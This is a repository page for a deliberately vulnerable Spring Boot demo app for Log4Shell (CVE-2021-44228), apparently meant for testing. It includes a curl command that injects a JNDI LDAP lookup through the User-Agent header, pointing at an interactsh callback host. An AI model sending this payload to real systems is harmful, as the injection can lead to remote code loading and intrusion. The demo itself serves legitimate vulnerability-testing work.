Giters

korteke / log4shell-demo

Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Simple Spring Boot application which is vulnerable to Log4Shell (CVE-2021-44228)

  • Changed default logging framework from logback to log4j2

Application logs 'User-Agent' header, so one can test vulnerability with curl and e.g. interactsh-service:

curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/

One should see DNS interaction at app.interactsh.com.

Docker hub

Link to Docker hub

About

Simple webapp that is vulnerable to Log4Shell (CVE-2021-44228)

Languages

Language:Java 78.1%Language:Dockerfile 21.9%